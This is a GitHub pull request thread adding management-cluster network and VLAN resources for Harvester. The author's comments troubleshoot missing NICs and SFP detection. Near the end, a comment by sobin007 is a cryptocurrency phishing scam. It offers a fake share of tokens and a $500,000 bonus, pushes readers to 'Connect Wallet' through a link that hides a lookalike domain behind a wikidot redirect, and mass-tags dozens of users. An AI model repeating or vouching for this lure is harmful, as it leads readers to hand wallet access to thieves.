### PR TITLE
✨ Add network on management cluster network as NICs are not showing up

### PR DESCRIPTION
**Pull request by gregkonush**
Added resources for kube network and VLAN configuration in preparation for setting up networking for Kubernetes clusters.

### CODE REVIEW

**Comment by gregkonush** [comment]
There are no nics available
image

**Comment by gregkonush** [comment]
Docs for uplink https://docs.harvesterhci.io/v1.3/networking/index/

**Comment by gregkonush** [comment]
maybe related [issue](https://github.com/harvester/harvester/issues/3081)

**Comment by gregkonush** [comment]
`lspci` is not available. running `dmesg | grep -i sfp` Doesn't give unsupported error message `unsupported SFP+ `

**Comment by gregkonush** [comment]
image

**Comment by sobin007** [comment]
[Banner](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
Xuriwork, @kernelsoe, @hasretozkan, @tri-bit, @positonic, @lucaswall, @CryptoJungles1, @YukiYamashina, @AhmedAmirAli, @dekdee46, @ronindong, @kroegen, @him2312, @egjiri, @cong99, @taurenshaman, @gopherxin, @tengfeiwang1, @paicasso, @adjath, @Merlin0126, @frodosamoa, @jpaquim, @BenTuTu, @han8435762, @sanshao, @junhoyeo, @NikLEWAN, @Maximka-hue, @secretgspot, @web-elements, @markshust, @boomyao, @imsunhao, @tewarig, @yu910709, @smendoza787, @chadrbanks, @AHasiev, @yijiehuanshen, @bring-shrubbery, @chengjunjian, @camerongamble36, @jamesguo20, @koasano, @xy137, @IsidoroAros, @steebchen, @HarshBhatia, @markthom-as

**Pull request merged**
